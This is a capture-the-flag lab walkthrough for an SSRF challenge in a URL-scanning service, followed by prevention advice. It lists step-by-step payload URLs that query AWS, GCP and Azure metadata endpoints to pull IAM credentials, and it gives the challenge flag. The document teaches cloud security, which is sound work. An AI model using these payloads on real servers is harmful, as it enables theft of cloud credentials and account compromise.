Avatar

Labs / URL Scanner

  • Daily Challenge
  • Released 06 Aug 2025
The lab needs to be started first.
Need help to start?
Daily Challenge

URL Scanner - Complete SSRF to AWS Metadata Solution

Understanding SSRF and AWS Metadata

Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.

Step 1: Initial Reconnaissance

  1. Access the URL scanner: Navigate to http://<target-ip> to access the SecureScan Pro service (hosted on port 80)
  2. Test normal functionality: Try scanning a legitimate external URL like https://example.com
  3. Observe the response: Note the detailed information returned (headers, status, content preview)
  4. Analyze the request pattern: Understand how the service processes and displays URL content
Normal Request Example:
URL: https://example.com
Response: Shows headers, status code, content preview, server information
Deployment Architecture: The challenge runs on port 80 via nginx proxy, with the Flask app internally on port 8080 and the AWS metadata simulator on port 8081

Step 2: Testing for SSRF - AWS Metadata Discovery

Test AWS Metadata Endpoints

  1. Test AWS metadata access: Try scanning the well-known AWS metadata endpoints
Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/
  1. Discover AWS metadata service: Try the well-known AWS metadata endpoint
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/

Step 3: Exploring AWS Metadata Structure

  1. Access metadata root: Start with the basic metadata endpoint
URL: http://169.254.169.254/latest/meta-data/
  1. Explore available endpoints: You'll see a list like:
ami-id
hostname
instance-id
instance-type
local-hostname
local-ipv4
public-hostname
public-ipv4
security-groups
iam/
  1. Focus on IAM endpoints: The most sensitive data is usually in IAM credentials
Key Insight: AWS metadata often contains sensitive IAM credentials that can be used for privilege escalation and lateral movement in cloud environments.

Step 4: Extracting IAM Credentials and Flag

  1. Access IAM security credentials: Navigate to the IAM endpoints
Step 1: http://169.254.169.254/latest/meta-data/iam/
Step 2: http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step 3: http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
  1. Extract the credentials: The final endpoint contains the flag embedded in the JSON response
  2. Flag location: Look for the 'Challenge_Flag' field in the IAM credentials JSON
  3. Flag format: UUID format (117c287d-efb6-4e42-9292-51e180367855)
Expected JSON Response:
{
"Code" : "Success",
"LastUpdated" : "2025-08-06T12:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKIA...",
"SecretAccessKey" : "wJalrXUtnFEMI...",
"Token" : "AQoDYXdzEJr...",
"Expiration" : "2025-08-06T18:00:00Z",
"Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
"Note" : "SSRF Challenge Completed!"
}
Flag: 117c287d-efb6-4e42-9292-51e180367855

Step 5: Alternative Attack Methods

Method 1: Direct Path Access

http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole

Method 2: Explore Other Metadata

http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groups

Method 3: Real-World AWS Metadata

http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)

Understanding AWS Metadata Exposure

  • IAM credential theft: AWS metadata exposes temporary security credentials for the instance role
  • Instance information: Detailed system information about the EC2 instance
  • User data exposure: Startup scripts and configuration data
  • Security group info: Network security configuration details
  • Cross-service access: Credentials can be used to access other AWS services
  • Privilege escalation: Stolen IAM credentials may have broader permissions than expected

Real-World SSRF to AWS Metadata Impact

  • Complete AWS account compromise: IAM credentials can access S3, RDS, Lambda, and other services
  • Data exfiltration: Access to private S3 buckets and databases
  • Infrastructure manipulation: Creating/deleting resources, modifying security groups
  • Lateral movement: Using credentials to access other EC2 instances or services
  • Cost manipulation: Launching expensive resources or crypto mining instances
  • Compliance violations: Access to sensitive data without authorization

Prevention and Mitigation

  • Block metadata endpoints: Explicitly block access to 169.254.169.254 in applications
  • Use IMDSv2: Configure instances to require token-based metadata requests
  • Principle of least privilege: Minimize IAM role permissions on EC2 instances
  • Network segmentation: Isolate applications from sensitive internal services
  • Input validation: Whitelist allowed domains and IP ranges
  • WAF rules: Block requests to internal IP ranges and metadata endpoints
  • Monitoring: Alert on unusual metadata service access patterns

Technical Analysis of This Challenge

  • Vulnerability type: Server-Side Request Forgery (SSRF) targeting AWS metadata simulation
  • Root cause: No URL validation or filtering in the scanning service
  • Attack method: Direct request to simulated AWS metadata endpoints
  • Target service: AWS metadata service at 169.254.169.254 (intercepted and simulated)
  • Flag location: Embedded in IAM security credentials JSON response
  • Educational value: Demonstrates real-world cloud security attack vectors

Challenge Summary

This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.